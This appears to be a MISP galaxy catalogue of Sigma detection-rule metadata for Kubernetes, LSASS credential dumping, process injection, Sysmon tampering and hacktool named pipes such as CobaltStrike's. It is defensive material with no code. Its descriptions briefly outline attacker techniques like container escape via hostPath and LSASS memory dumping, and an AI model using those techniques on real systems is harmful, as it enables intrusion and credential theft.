New Kubernetes Service Account Created

Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.

Internal MISP references

UUID e31bae15-83ed-473e-bf31-faf4f8a17d36 which can be used as unique global reference for New Kubernetes Service Account Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Unknown']
filename kubernetes_audit_serviceaccount_creation.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1136']
Related clusters

To see the related clusters, click here.

Potential Remote Command Execution In Pod Container

Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.

Internal MISP references

UUID a1b0ca4e-7835-413e-8471-3ff2b8a66be6 which can be used as unique global reference for Potential Remote Command Execution In Pod Container in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['Legitimate debugging activity. Investigate the identity performing the requests and their authorization.']
filename kubernetes_audit_exec_into_container.yml
level medium
logsource.category application
logsource.product kubernetes
tags ['attack.t1609']
Related clusters

To see the related clusters, click here.

Container With A hostPath Mount Created

Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.

Internal MISP references

UUID 402b955c-8fe0-4a8c-b635-622b4ac5f902 which can be used as unique global reference for Container With A hostPath Mount Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['The DaemonSet controller creates pods with hostPath volumes within the kube-system namespace.']
filename kubernetes_audit_hostpath_mount.yml
level low
logsource.category application
logsource.product kubernetes
tags ['attack.t1611']
Related clusters

To see the related clusters, click here.

Creation Of Pod In System Namespace

Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.

Internal MISP references

UUID a80d927d-ac6e-443f-a867-e8d6e3897318 which can be used as unique global reference for Creation Of Pod In System Namespace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Leo Tsaousis (@laripping)
creation_date 2024/03/26
falsepositive ['System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace']
filename kubernetes_audit_pod_in_system_namespace.yml
level medium
logsource.category application
logsource.product kubernetes
tags ['attack.t1036.005']
Related clusters

To see the related clusters, click here.

Credential Dumping Attempt Via Svchost

Detects when a process tries to access the memory of svchost to potentially dump credentials.

Internal MISP references

UUID 174afcfa-6e40-4ae9-af64-496546389294 which can be used as unique global reference for Credential Dumping Attempt Via Svchost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florent Labouyrie
creation_date 2021/04/30
falsepositive ['Unknown']
filename proc_access_win_svchost_credential_dumping.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.t1548']
Related clusters

To see the related clusters, click here.

Remote LSASS Process Access Through Windows Remote Management

Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.

Internal MISP references

UUID aa35a627-33fb-4d04-a165-d33b4afca3e8 which can be used as unique global reference for Remote LSASS Process Access Through Windows Remote Management in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Patryk Prauze - ING Tech
creation_date 2019/05/20
falsepositive ['Unlikely']
filename proc_access_win_lsass_remote_access_trough_winrm.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1003.001', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.006', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Lsass Memory Dump via Comsvcs DLL

Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.

Internal MISP references

UUID a49fa4d5-11db-418c-8473-1e014a8dd462 which can be used as unique global reference for Lsass Memory Dump via Comsvcs DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/20
falsepositive ['Unknown']
filename proc_access_win_lsass_dump_comsvcs_dll.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

CMSTP Execution Process Access

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Internal MISP references

UUID 3b4b232a-af90-427c-a22f-30b0c0837b95 which can be used as unique global reference for CMSTP Execution Process Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman
creation_date 2018/07/16
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename proc_access_win_cmstp_execution_by_access.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.003', 'attack.execution', 'attack.t1559.001', 'attack.g0069', 'attack.g0080', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

HackTool - Generic Process Access

Detects process access requests from hacktool processes based on their default image name

Internal MISP references

UUID d0d2f720-d14f-448d-8242-51ff396a334e which can be used as unique global reference for HackTool - Generic Process Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023/11/27
falsepositive ['Unlikely']
filename proc_access_win_hktl_generic_access.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Credential Dumping Attempt Via WerFault

Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.

Internal MISP references

UUID e5b33f7d-eb93-48b6-9851-09e1e610b6d7 which can be used as unique global reference for Credential Dumping Attempt Via WerFault in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2012/06/27
falsepositive ['Actual failures in lsass.exe that trigger a crash dump (unlikely)', 'Unknown cases in which WerFault accesses lsass.exe']
filename proc_access_win_lsass_werfault.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Potential Direct Syscall of NtOpenProcess

Detects potential calls to NtOpenProcess directly from NTDLL.

Internal MISP references

UUID 3f3f3506-1895-401b-9cc3-e86b16e630d0 which can be used as unique global reference for Potential Direct Syscall of NtOpenProcess in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), Tim Shelton (FP)
creation_date 2021/07/28
falsepositive ['Unknown']
filename proc_access_win_susp_direct_ntopenprocess_call.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.execution', 'attack.t1106']
Related clusters

To see the related clusters, click here.

Suspicious LSASS Access Via MalSecLogon

Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right.

Internal MISP references

UUID 472159c5-31b9-4f56-b794-b766faa8b0a7 which can be used as unique global reference for Suspicious LSASS Access Via MalSecLogon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/29
falsepositive ['Unknown']
filename proc_access_win_lsass_seclogon_access.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Svchost Process Access

Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.

Internal MISP references

UUID 166e9c50-8cd9-44af-815d-d1f0c0e90dde which can be used as unique global reference for Suspicious Svchost Process Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Burrell
creation_date 2020/01/02
falsepositive ['Unknown']
filename proc_access_win_svchost_susp_access_request.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

UAC Bypass Using WOW64 Logger DLL Hijack

Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)

Internal MISP references

UUID 4f6c43e2-f989-4ea5-bcd8-843b49a0317c which can be used as unique global reference for UAC Bypass Using WOW64 Logger DLL Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_access_win_uac_bypass_wow64_logger.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Shellcode Injection

Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject

Internal MISP references

UUID 250ae82f-736e-4844-a68b-0b5e8cc887da which can be used as unique global reference for Potential Shellcode Injection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/03/11
falsepositive ['Unknown']
filename proc_access_win_susp_shellcode_injection.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

HackTool - LittleCorporal Generated Maldoc Injection

Detects the process injection of a LittleCorporal generated Maldoc.

Internal MISP references

UUID 7bdde3bf-2a42-4c39-aa31-a92b3e17afac which can be used as unique global reference for HackTool - LittleCorporal Generated Maldoc Injection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unknown']
filename proc_access_win_hktl_littlecorporal_generated_maldoc.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.execution', 'attack.t1204.002', 'attack.t1055.003']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Activity Via LSASS

Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.

Internal MISP references

UUID 5ef9853e-4d0e-4a70-846f-a9ca37d876da which can be used as unique global reference for Potential Credential Dumping Activity Via LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, Michael Haag
creation_date 2019/04/03
falsepositive ['Unknown']
filename proc_access_win_lsass_memdump.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

HackTool - CobaltStrike BOF Injection Pattern

Detects a typical pattern of a CobaltStrike BOF which inject into other processes

Internal MISP references

UUID 09706624-b7f6-455d-9d02-adee024cee1d which can be used as unique global reference for HackTool - CobaltStrike BOF Injection Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/04
falsepositive ['Unknown']
filename proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.execution', 'attack.t1106', 'attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious GrantedAccess Flags On LSASS

Detects process access requests to LSASS process with potentially suspicious access flags

Internal MISP references

UUID a18dd26b-6450-46de-8c91-9659150cf088 which can be used as unique global reference for Potentially Suspicious GrantedAccess Flags On LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community
creation_date 2021/11/22
falsepositive ['Legitimate software such as AV and EDR']
filename proc_access_win_lsass_susp_access_flag.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Potential NT API Stub Patching

Detects potential NT API stub patching as seen used by the project PatchingAPI

Internal MISP references

UUID b916cba1-b38a-42da-9223-17114d846fd6 which can be used as unique global reference for Potential NT API Stub Patching in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/07
falsepositive ['Unknown']
filename proc_access_win_susp_invoke_patchingapi.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

LSASS Access From Potentially White-Listed Processes

Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference

Internal MISP references

UUID 4be8b654-0c01-4c9d-a10c-6b28467fc651 which can be used as unique global reference for LSASS Access From Potentially White-Listed Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/10
falsepositive ['Unknown']
filename proc_access_win_lsass_whitelisted_process_names.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Credential Dumping Activity By Python Based Tool

Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.

Internal MISP references

UUID f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9 which can be used as unique global reference for Credential Dumping Activity By Python Based Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj, Jonhnathan Ribeiro
creation_date 2023/11/27
falsepositive ['Unknown']
filename proc_access_win_lsass_python_based_tool.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0349']
Related clusters

To see the related clusters, click here.

HackTool - HandleKatz Duplicating LSASS Handle

Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles

Internal MISP references

UUID b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5 which can be used as unique global reference for HackTool - HandleKatz Duplicating LSASS Handle in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj (rule), @thefLinkk
creation_date 2022/06/27
falsepositive ['Unknown']
filename proc_access_win_hktl_handlekatz_lsass_access.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.execution', 'attack.t1106', 'attack.defense_evasion', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

LSASS Memory Access by Tool With Dump Keyword In Name

Detects LSASS process access requests from a source process with the "dump" keyword in its image name.

Internal MISP references

UUID 9bd012ee-0dff-44d7-84a0-aa698cfd87a3 which can be used as unique global reference for LSASS Memory Access by Tool With Dump Keyword In Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/10
falsepositive ['Rare programs that contain the word dump in their name and access lsass']
filename proc_access_win_lsass_dump_keyword_image.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0002']
Related clusters

To see the related clusters, click here.

Function Call From Undocumented COM Interface EditionUpgradeManager

Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.

Internal MISP references

UUID fb3722e4-1a06-46b6-b772-253e2e7db933 which can be used as unique global reference for Function Call From Undocumented COM Interface EditionUpgradeManager in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Dmitry Uchakin
creation_date 2020/10/07
falsepositive ['Unknown']
filename proc_access_win_uac_bypass_editionupgrademanagerobj.yml
level medium
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

HackTool - SysmonEnte Execution

Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon

Internal MISP references

UUID d29ada0f-af45-4f27-8f32-f7b77c3dbc4e which can be used as unique global reference for HackTool - SysmonEnte Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/07
falsepositive ['Unknown']
filename proc_access_win_hktl_sysmonente.yml
level high
logsource.category process_access
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Potential Process Hollowing Activity

Detects when a memory process image does not match the disk image, indicative of process hollowing.

Internal MISP references

UUID c4b890e5-8d8c-4496-8c66-c805753817cd which can be used as unique global reference for Potential Process Hollowing Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S
creation_date 2022/01/25
falsepositive ['Unknown']
filename proc_tampering_susp_process_hollowing.yml
level medium
logsource.category process_tampering
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055.012']
Related clusters

To see the related clusters, click here.

Sysmon Blocked Executable

Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy

Internal MISP references

UUID 23b71bc5-953e-4971-be4c-c896cda73fc2 which can be used as unique global reference for Sysmon Blocked Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/16
falsepositive ['Unlikely']
filename sysmon_file_block_executable.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Sysmon Configuration Change

Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration

Internal MISP references

UUID 8ac03a65-6c84-4116-acad-dc1558ff7a77 which can be used as unique global reference for Sysmon Configuration Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/12
falsepositive ['Legitimate administrative action']
filename sysmon_config_modification.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Sysmon Blocked File Shredding

Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy.

Internal MISP references

UUID c3e5c1b1-45e9-4632-b242-27939c170239 which can be used as unique global reference for Sysmon Blocked File Shredding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/07/20
falsepositive ['Unlikely']
filename sysmon_file_block_shredding.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Sysmon Configuration Error

Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages

Internal MISP references

UUID 815cd91b-7dbc-4247-841a-d7dd1392b0a8 which can be used as unique global reference for Sysmon Configuration Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/04
falsepositive ['Legitimate administrative action']
filename sysmon_config_modification_error.yml
level high
logsource.category sysmon_error
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564']
Related clusters

To see the related clusters, click here.

Sysmon Configuration Modification

Detects when an attacker tries to hide from Sysmon by disabling or stopping it

Internal MISP references

UUID 1f2b5353-573f-4880-8e33-7d04dcf97744 which can be used as unique global reference for Sysmon Configuration Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/04
falsepositive ['Legitimate administrative action']
filename sysmon_config_modification_status.yml
level high
logsource.category sysmon_status
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564']
Related clusters

To see the related clusters, click here.

Sysmon File Executable Creation Detected

Triggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created.

Internal MISP references

UUID 693a44e9-7f26-4cb6-b787-214867672d3a which can be used as unique global reference for Sysmon File Executable Creation Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/07/20
falsepositive ['Unlikely']
filename sysmon_file_executable_detected.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

CobaltStrike Named Pipe

Detects the creation of a named pipe as used by CobaltStrike

Internal MISP references

UUID d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 which can be used as unique global reference for CobaltStrike Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Wojciech Lesicki
creation_date 2021/05/25
falsepositive ['Unknown']
filename pipe_created_hktl_cobaltstrike.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

PUA - CSExec Default Named Pipe

Detects default CSExec pipe creation

Internal MISP references

UUID f318b911-ea88-43f4-9281-0de23ede628e which can be used as unique global reference for PUA - CSExec Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/07
falsepositive ['Legitimate Administrator activity']
filename pipe_created_pua_csexec_default_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

HackTool - DiagTrackEoP Default Named Pipe

Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.

Internal MISP references

UUID 1f7025a6-e747-4130-aac4-961eb47015f1 which can be used as unique global reference for HackTool - DiagTrackEoP Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unlikely']
filename pipe_created_hktl_diagtrack_eop.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.privilege_escalation']

HackTool - EfsPotato Named Pipe Creation

Detects the pattern of a pipe name as used by the hack tool EfsPotato

Internal MISP references

UUID 637f689e-b4a5-4a86-be0e-0100a0a33ba2 which can be used as unique global reference for HackTool - EfsPotato Named Pipe Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/23
falsepositive ['\pipe\LOCAL\Monitorian']
filename pipe_created_hktl_efspotato.yml
level high
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

New PowerShell Instance Created

Detects the execution of PowerShell via the creation of a named pipe starting with PSHost

Internal MISP references

UUID ac7102b4-9e1e-4802-9b4f-17c5524c015c which can be used as unique global reference for New PowerShell Instance Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019/09/12
falsepositive ['Likely']
filename pipe_created_powershell_execution_pipe.yml
level informational
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Alternate PowerShell Hosts Pipe

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

Internal MISP references

UUID 58cb02d5-78ce-4692-b3e1-dce850aae41a which can be used as unique global reference for Alternate PowerShell Hosts Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
creation_date 2019/09/12
falsepositive ['Programs using PowerShell directly without invocation of a dedicated interpreter.']
filename pipe_created_powershell_alternate_host_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

CobaltStrike Named Pipe Patterns

Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles

Internal MISP references

UUID 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 which can be used as unique global reference for CobaltStrike Named Pipe Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
creation_date 2021/07/30
falsepositive ['Chrome instances using the exact same pipe name "mojo.xxx"', 'Websense Endpoint using the pipe name "DserNamePipe(R
filename pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml
level high
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055', 'stp.1k']
Related clusters

To see the related clusters, click here.

PUA - PAExec Default Named Pipe

Detects PAExec default named pipe

Internal MISP references

UUID f6451de4-df0a-41fa-8d72-b39f54a08db5 which can be used as unique global reference for PUA - PAExec Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Unknown']
filename pipe_created_pua_paexec_default_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

HackTool - Credential Dumping Tools Named Pipe Created

Detects well-known credential dumping tools execution via specific named pipe creation

Internal MISP references

UUID 961d0ba2-3eea-4303-a930-2cf78bbfcc5e which can be used as unique global reference for HackTool - Credential Dumping Tools Named Pipe Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/11/01
falsepositive ['Legitimate Administrator using tool for password recovery']
filename pipe_created_hktl_generic_cred_dump_tools_pipes.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005']
Related clusters

To see the related clusters, click here.

HackTool - Koh Default Named Pipe

Detects creation of default named pipes used by the Koh tool

Internal MISP references

UUID 0adc67e0-a68f-4ffd-9c43-28905aad5d6a which can be used as unique global reference for HackTool - Koh Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/08
falsepositive ['Unlikely']
filename pipe_created_hktl_koh_default_pipe.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access', 'attack.t1528', 'attack.t1134.001']
Related clusters

To see the related clusters, click here.

ADFS Database Named Pipe Connection By Uncommon Tool

Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.

Internal MISP references

UUID 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3 which can be used as unique global reference for ADFS Database Named Pipe Connection By Uncommon Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2021/10/08
falsepositive ['Unknown']
filename pipe_created_adfs_namedpipe_connection_uncommon_tool.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

WMI Event Consumer Created Named Pipe

Detects the WMI Event Consumer service scrcons.exe creating a named pipe

Internal MISP references

UUID 493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb which can be used as unique global reference for WMI Event Consumer Created Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/09/01
falsepositive ['Unknown']
filename pipe_created_scrcons_wmi_consumer_namedpipe.yml
level medium
logsource.category pipe_created
logsource.product windows
tags ['attack.t1047', 'attack.execution']
Related clusters

To see the related clusters, click here.

CobaltStrike Named Pipe Pattern Regex

Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles

Internal MISP references

UUID 0e7163d4-9e19-4fa7-9be6-000c61aad77a which can be used as unique global reference for CobaltStrike Named Pipe Pattern Regex in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/30
falsepositive ['Unknown']
filename pipe_created_hktl_cobaltstrike_re.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

HackTool - CoercedPotato Named Pipe Creation

Detects the pattern of a pipe name as used by the hack tool CoercedPotato

Internal MISP references

UUID 4d0083b3-580b-40da-9bba-626c19fe4033 which can be used as unique global reference for HackTool - CoercedPotato Named Pipe Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/10/11
falsepositive ['Unknown']
filename pipe_created_hktl_coercedpotato.yml
level high
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Malicious Named Pipe Created

Detects the creation of a named pipe seen used by known APTs or malware.

Internal MISP references

UUID fe3ac066-98bb-432a-b1e7-a5229cb39d4a which can be used as unique global reference for Malicious Named Pipe Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), blueteam0ps, elhoim
creation_date 2017/11/06
falsepositive ['Unknown']
filename pipe_created_susp_malicious_namedpipes.yml
level critical
logsource.category pipe_created
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

PUA - RemCom Default Named Pipe

Detects default RemCom pipe creation

Internal MISP references

UUID d36f87ea-c403-44d2-aa79-1a0ac7c24456 which can be used as unique global reference for PUA - RemCom Default Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/07
falsepositive ['Legitimate Administrator activity']
filename pipe_created_pua_remcom_default_pipe.yml
level medium
logsource.category pipe_created
logsource.product windows
